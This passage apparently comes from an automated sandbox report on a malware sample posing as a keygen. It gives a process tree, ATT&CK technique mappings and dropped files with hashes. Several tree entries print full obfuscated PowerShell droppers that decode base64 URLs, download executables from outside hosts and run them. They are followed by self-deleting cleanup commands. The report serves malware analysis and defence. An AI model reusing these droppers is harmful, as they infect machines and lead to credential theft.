                          • Delays execution with timeout.exe
                          PID:1892
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\b.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:560
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Blocklisted process makes network request
                            • Loads dropped DLL
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:432
                            • C:\Users\Public\gmo.exe
                              "C:\Users\Public\gmo.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2732
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                                6⤵
                                • Loads dropped DLL
                                PID:1996
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2956
                                  • C:\Windows\SysWOW64\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                                    8⤵
                                    • Loads dropped DLL
                                    PID:1200
                                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                      9⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2588
                                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                        10⤵
                                        • Executes dropped EXE
                                        PID:1068
                                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                        10⤵
                                        • Executes dropped EXE
                                        PID:760
                                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                        10⤵
                                        • Executes dropped EXE
                                        PID:472
                                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    PID:2576
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2576 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\824330388304141\\* & exit
                                      9⤵
                                        PID:2000
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /pid 2576
                                          10⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1144
                                • C:\Users\Public\gmo.exe
                                  "C:\Users\Public\gmo.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:1512
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\b1.hta"
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of WriteProcessMemory
                            PID:1124
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1852
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout 2
                            3⤵
                            • Delays execution with timeout.exe
                            PID:1032
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\ba.hta"
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of WriteProcessMemory
                            PID:1680
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                              4⤵
                              • Blocklisted process makes network request
                              • Loads dropped DLL
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1512
                              • C:\Users\Public\ohd.exe
                                "C:\Users\Public\ohd.exe"
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: MapViewOfSection
                                • Suspicious use of SetWindowsHookEx
                                PID:2760
                                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: MapViewOfSection
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2884
                                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    PID:2968
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2968 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\919988344538285\\* & exit
                                      8⤵
                                        PID:2076
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /pid 2968
                                          9⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1072
                                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: MapViewOfSection
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2908
                                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:3068
                                  • C:\Users\Public\ohd.exe
                                    "C:\Users\Public\ohd.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:2988
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\ba1.hta"
                              3⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of WriteProcessMemory
                              PID:1096
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1944

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Persistence

                        Modify Existing Service

                        1
                        T1031

                        Registry Run Keys / Startup Folder

                        1
                        T1060

                        Defense Evasion

                        Modify Registry

                        6
                        T1112

                        Disabling Security Tools

                        2
                        T1089

                        Install Root Certificate

                        1
                        T1130

                        Credential Access

                        Credentials in Files

                        3
                        T1081

                        Discovery

                        Query Registry

                        2
                        T1012

                        System Information Discovery

                        2
                        T1082

                        Collection

                        Data from Local System

                        3
                        T1005

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\MSVCP140.dll
                        • C:\ProgramData\VCRUNTIME140.dll
                        • C:\ProgramData\freebl3.dll
                        • C:\ProgramData\freebl3.dll
                        • C:\ProgramData\mozglue.dll
                        • C:\ProgramData\mozglue.dll
                        • C:\ProgramData\msvcp140.dll
                        • C:\ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • C:\ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • C:\ProgramData\softokn3.dll
                        • C:\ProgramData\softokn3.dll
                        • C:\ProgramData\sqlite3.dll
                        • C:\ProgramData\sqlite3.dll
                        • C:\ProgramData\vcruntime140.dll
                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0c76d41d-673d-4147-a744-07f568db6b00
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ab2c564-9698-406f-80da-b82bfb15ab48
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38604b7f-3b56-4cdf-857e-df63e390b481
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a38e600-169e-4ec7-98bd-529788f42566
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_42778251-f07e-4ae1-bc57-a77894ebb1f5
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4c3f706e-97a9-41e8-aca3-b206a4c6c3c2
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c80f677-3c28-410d-966a-1d329145fa84
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787c3b31-123f-4cd9-8db7-f7f5c80be938
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a700e20d-ef30-47d4-abf6-6f8f1430f64a
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e83053b6-6e1d-4d82-9bb6-a7915e6f382e
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_efb7660c-5970-4129-a3ca-62358c22c935
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        • C:\Users\Admin\AppData\Local\Temp\3949.tmp\Keygen.exe
                        • C:\Users\Admin\AppData\Local\Temp\3949.tmp\Keygen.exe
                        • C:\Users\Admin\AppData\Local\Temp\3949.tmp\b.hta
                        • C:\Users\Admin\AppData\Local\Temp\3949.tmp\b1.hta
                        • C:\Users\Admin\AppData\Local\Temp\3949.tmp\ba.hta
                        • C:\Users\Admin\AppData\Local\Temp\3949.tmp\ba1.hta
                        • C:\Users\Admin\AppData\Local\Temp\3949.tmp\m.hta
                        • C:\Users\Admin\AppData\Local\Temp\3949.tmp\m1.hta
                        • C:\Users\Admin\AppData\Local\Temp\3949.tmp\start.bat
                        • C:\Users\Admin\AppData\Local\Temp\7YV5UTmxW1.exe
                        • C:\Users\Admin\AppData\Local\Temp\7YV5UTmxW1.exe
                        • C:\Users\Admin\AppData\Local\Temp\8dP3WoGb3J.exe
                        • C:\Users\Admin\AppData\Local\Temp\8dP3WoGb3J.exe
                        • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                        • C:\Users\Admin\AppData\Local\Temp\ZU1WuBNNan.exe
                          MD5

                          013db621a3351e3fb049efd2ccad79ff

                          SHA1

                          a23394ea54dbc5342a77938a2c285ee616185560

                          SHA256

                          df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                          SHA512

                          1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                        • C:\Users\Admin\AppData\Local\Temp\ZU1WuBNNan.exe
                          MD5

                          013db621a3351e3fb049efd2ccad79ff

                          SHA1

                          a23394ea54dbc5342a77938a2c285ee616185560

                          SHA256

                          df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                          SHA512

                          1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        • C:\Users\Admin\AppData\Local\Temp\qdBDEAERsZ.exe
                        • C:\Users\Admin\AppData\Local\Temp\qdBDEAERsZ.exe
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                        • C:\Users\Public\Natso.bat
                        • C:\Users\Public\Natso.bat
                        • C:\Users\Public\gmo.exe
                        • C:\Users\Public\gmo.exe
                        • C:\Users\Public\gmo.exe
                        • C:\Users\Public\jlu.exe
                        • C:\Users\Public\jlu.exe
                        • C:\Users\Public\jlu.exe
                        • C:\Users\Public\ohd.exe
                        • C:\Users\Public\ohd.exe
                        • C:\Users\Public\ohd.exe
                        • C:\Windows\temp\pwgdy45s.inf
                        • \??\PIPE\lsarpc
                        • \??\PIPE\srvsvc
                        • \??\PIPE\srvsvc
                        • \ProgramData\mozglue.dll
                        • \ProgramData\mozglue.dll
                        • \ProgramData\mozglue.dll
                        • \ProgramData\msvcp140.dll
                        • \ProgramData\msvcp140.dll
                        • \ProgramData\msvcp140.dll
                        • \ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • \ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • \ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • \ProgramData\sqlite3.dll
                        • \ProgramData\sqlite3.dll
                        • \ProgramData\sqlite3.dll
                        • \ProgramData\vcruntime140.dll
                        • \ProgramData\vcruntime140.dll
                        • \ProgramData\vcruntime140.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                          MD5

                          02cc7b8ee30056d5912de54f1bdfc219

                          SHA1

                          a6923da95705fb81e368ae48f93d28522ef552fb

                          SHA256

                          1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                          SHA512

                          0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                        • \Users\Admin\AppData\LocalLow\sqlite3.dll
                        • \Users\Admin\AppData\Local\Temp\3949.tmp\Keygen.exe
                        • \Users\Admin\AppData\Local\Temp\7YV5UTmxW1.exe
                        • \Users\Admin\AppData\Local\Temp\8dP3WoGb3J.exe
                        • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
